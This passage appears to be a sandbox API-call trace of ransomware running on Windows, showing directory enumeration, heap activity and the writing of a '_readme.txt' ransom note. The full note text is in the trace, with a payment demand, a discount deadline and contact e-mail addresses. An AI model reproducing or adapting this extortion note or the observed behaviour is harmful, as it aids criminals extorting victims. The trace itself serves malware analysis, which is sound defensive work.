lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.548] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.548] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.548] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.557] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.634] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0183.634] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.635] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.635] PathFindFileNameW (pszPath="") returned="" [0183.635] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.635] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.636] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.636] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.637] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0183.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.637] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0183.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.638] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 